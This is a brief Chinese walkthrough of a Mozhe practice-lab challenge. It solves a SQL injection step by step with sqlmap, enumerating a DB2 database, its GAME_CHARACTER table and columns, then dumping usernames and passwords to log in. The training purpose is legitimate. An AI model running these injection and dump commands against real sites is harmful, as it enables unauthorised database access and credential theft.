地址:https://www.mozhe.cn/bug/detail/NjM3MSt5VWovcWtHOU9kaUF5dUFXQT09bW96aGUmozhe
环境:主机
工具:SQLmap
1.首先启动(3墨币)
2.此题思路是去找注入点,点击图中的通知,没有就刷新
3.使用sqlmap,查询数据库
python3 sqlmap.py -u "http://124.70.71. 251:46332/new_list.php?id=1" –dbs
4.查询表
python3 sqlmap.py -u "http://124.70.71.251:46332/new_list.php?id=1" -D DB2INST1 --tables
5.查询字段
python3 sqlmap.py -u "http://124.70.71.251:46332/new_list.php?id=1" -D DB2INST1 -T GAME_CHARACTER --column
这里的字段name,password被隐藏了
6.查name
python3 sqlmap.py -u "http://124.70.71.251:46332/new_list.php?id=1" -D DB2INST1 -T GAME_CHARACTER -C name --dump
7.查password
python3 sqlmap.py -u "http://124.70.71.251:46332/new_list.php?id=1" -D DB2INST1 -T GAME_CHARACTER -C password --dump
8.这里需要对密码进行解码,再登陆就会有KEY